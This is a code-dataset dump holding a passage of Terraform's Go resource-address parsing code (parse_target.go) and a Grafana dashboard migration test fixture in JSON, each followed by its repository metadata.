switch tt := addr.Subject.(type) {
case AbsResource:
return tt, diags
case AbsResourceInstance: // Catch likely user error with specialized message
// Assume that the last element of the traversal must be the index,
// since that's required for a valid resource instance address.
indexStep := traversal[len(traversal)-1]
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource address is required. This instance key identifies a specific resource instance, which is not expected here.",
Subject: indexStep.SourceRange().Ptr(),
})
return AbsResource{}, diags
case ModuleInstance: // Catch likely user error with specialized message
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource address is required here. The module path must be followed by a resource specification.",
Subject: traversal.SourceRange().Ptr(),
})
return AbsResource{}, diags
default: // Generic message for other address types
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource address is required here.",
Subject: traversal.SourceRange().Ptr(),
})
return AbsResource{}, diags
}
}
// ParseAbsResourceStr is a helper wrapper around ParseAbsResource that takes a
// string and parses it with the HCL native syntax traversal parser before
// interpreting it.
//
// Error diagnostics are returned if either the parsing fails or the analysis
// of the traversal fails. There is no way for the caller to distinguish the
// two kinds of diagnostics programmatically. If error diagnostics are returned
// the returned address may be incomplete.
//
// Since this function has no context about the source of the given string,
// any returned diagnostics will not have meaningful source location
// information.
func ParseAbsResourceStr(str string) (AbsResource, tfdiags.Diagnostics) {
var diags tfdiags.Diagnostics
traversal, parseDiags := hclsyntax.ParseTraversalAbs([]byte(str), "", hcl.Pos{Line: 1, Column: 1})
diags = diags.Append(parseDiags)
if parseDiags.HasErrors() {
return AbsResource{}, diags
}
addr, addrDiags := ParseAbsResource(traversal)
diags = diags.Append(addrDiags)
return addr, diags
}
// ParseAbsResourceInstance attempts to interpret the given traversal as an
// absolute resource instance address, using the same syntax as expected by
// ParseTarget.
//
// If no error diagnostics are returned, the returned target includes the
// address that was extracted and the source range it was extracted from.
//
// If error diagnostics are returned then the AbsResource value is invalid and
// must not be used.
func ParseAbsResourceInstance(traversal hcl.Traversal) (AbsResourceInstance, tfdiags.Diagnostics) {
target, diags := ParseTarget(traversal)
if diags.HasErrors() {
return AbsResourceInstance{}, diags
}
addr, validateDiags := validateResourceFromTarget(target, traversal.SourceRange().Ptr())
diags = diags.Append(validateDiags)
return addr, diags
}
// ParsePartialResourceInstance attempts to interpret the given traversal as a
// partial absolute resource instance address, using the same syntax as expected
// by ParsePartialTarget.
//
// If no error diagnostics are returned, the returned target includes the
// address that was extracted and the source range it was extracted from.
//
// If error diagnostics are returned then the AbsResource value is invalid and
// must not be used.
func ParsePartialResourceInstance(traversal hcl.Traversal) (AbsResourceInstance, tfdiags.Diagnostics) {
target, diags := ParsePartialTarget(traversal)
if diags.HasErrors() {
return AbsResourceInstance{}, diags
}
addr, validateDiags := validateResourceFromTarget(target, traversal.SourceRange().Ptr())
diags = diags.Append(validateDiags)
return addr, diags
}
func validateResourceFromTarget(addr *Target, src *hcl.Range) (AbsResourceInstance, tfdiags.Diagnostics) {
var diags tfdiags.Diagnostics
switch tt := addr.Subject.(type) {
case AbsResource:
return tt.Instance(NoKey), diags
case AbsResourceInstance:
return tt, diags
case ModuleInstance: // Catch likely user error with specialized message
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource instance address is required here. The module path must be followed by a resource instance specification.",
Subject: src,
})
return AbsResourceInstance{}, diags
default: // Generic message for other address types
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource address is required here.",
Subject: src,
})
return AbsResourceInstance{}, diags
}
}
// ParseAbsResourceInstanceStr is a helper wrapper around
// ParseAbsResourceInstance that takes a string and parses it with the HCL
// native syntax traversal parser before interpreting it.
//
// Error diagnostics are returned if either the parsing fails or the analysis
// of the traversal fails. There is no way for the caller to distinguish the
// two kinds of diagnostics programmatically. If error diagnostics are returned
// the returned address may be incomplete.
//
// Since this function has no context about the source of the given string,
// any returned diagnostics will not have meaningful source location
// information.
func ParseAbsResourceInstanceStr(str string) (AbsResourceInstance, tfdiags.Diagnostics) {
var diags tfdiags.Diagnostics
traversal, parseDiags := hclsyntax.ParseTraversalAbs([]byte(str), "", hcl.Pos{Line: 1, Column: 1})
diags = diags.Append(parseDiags)
if parseDiags.HasErrors() {
return AbsResourceInstance{}, diags
}
addr, addrDiags := ParseAbsResourceInstance(traversal)
diags = diags.Append(addrDiags)
return addr, diags
}
// ParsePartialResourceInstanceStr is a helper wrapper around
// ParsePartialResourceInstance that takes a string and parses it with the HCL
// native syntax traversal parser before interpreting it.
//
// Error diagnostics are returned if either the parsing fails or the analysis
// of the traversal fails. There is no way for the caller to distinguish the
// two kinds of diagnostics programmatically. If error diagnostics are returned
// the returned address may be incomplete.
//
// Since this function has no context about the source of the given string,
// any returned diagnostics will not have meaningful source location
// information.
func ParsePartialResourceInstanceStr(str string) (AbsResourceInstance, tfdiags.Diagnostics) {
var diags tfdiags.Diagnostics
traversal, parseDiags := hclsyntax.ParseTraversalPartial([]byte(str), "", hcl.Pos{Line: 1, Column: 1})
diags = diags.Append(parseDiags)
if parseDiags.HasErrors() {
return AbsResourceInstance{}, diags
}
addr, addrDiags := ParsePartialResourceInstance(traversal)
diags = diags.Append(addrDiags)
return addr, diags
}
// ModuleAddr returns the module address portion of the subject of
// the recieving target.
//
// Regardless of specific address type, all targets always include
// a module address. They might also include something in that
// module, which this method always discards if so.
func (t *Target) ModuleAddr() ModuleInstance {
switch addr := t.Subject.(type) {
case ModuleInstance:
return addr
case Module:
// We assume that a module address is really
// referring to a module path containing only
// single-instance modules.
return addr.UnkeyedInstanceShim()
case AbsResourceInstance:
return addr.Module
case AbsResource:
return addr.Module
case AbsAction:
return addr.Module
case AbsActionInstance:
return addr.Module
default:
// The above cases should be exhaustive for all
// implementations of Targetable.
panic(fmt.Sprintf("unsupported target address type %T", addr))
}
}
|
go
|
github
|
https://github.com/hashicorp/terraform
|
internal/addrs/parse_target.go
|
{
"kind": "Dashboard",
"apiVersion": "dashboard.grafana.app/v2alpha1",
"metadata": {
"name": "v40.refresh_string.v42"
},
"spec": {
"annotations": [
{
"kind": "AnnotationQuery",
"spec": {
"datasource": {
"type": "grafana",
"uid": "-- Grafana --"
},
"query": {
"kind": "grafana",
"spec": {}
},
"enable": true,
"hide": true,
"iconColor": "rgba(0, 211, 255, 1)",
"name": "Annotations \u0026 Alerts",
"builtIn": true,
"legacyOptions": {
"type": "dashboard"
}
}
}
],
"cursorSync": "Off",
"editable": true,
"elements": {},
"layout": {
"kind": "GridLayout",
"spec": {
"items": []
}
},
"links": [],
"liveNow": false,
"preload": false,
"tags": [],
"timeSettings": {
"timezone": "",
"from": "now-6h",
"to": "now",
"autoRefresh": "1m",
"autoRefreshIntervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
],
"hideTimepicker": false,
"fiscalYearStartMonth": 0
},
"title": "String Refresh Test Dashboard",
"variables": []
},
"status": {
"conversion": {
"failed": false,
"storedVersion": "v1beta1"
}
}
}
|
json
|
github
|
https://github.com/grafana/grafana
|
apps/dashboard/pkg/migration/conversion/testdata/migrated_dashboards_output/v1beta1-mig-v40.refresh_string.v42.v2alpha1.json
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.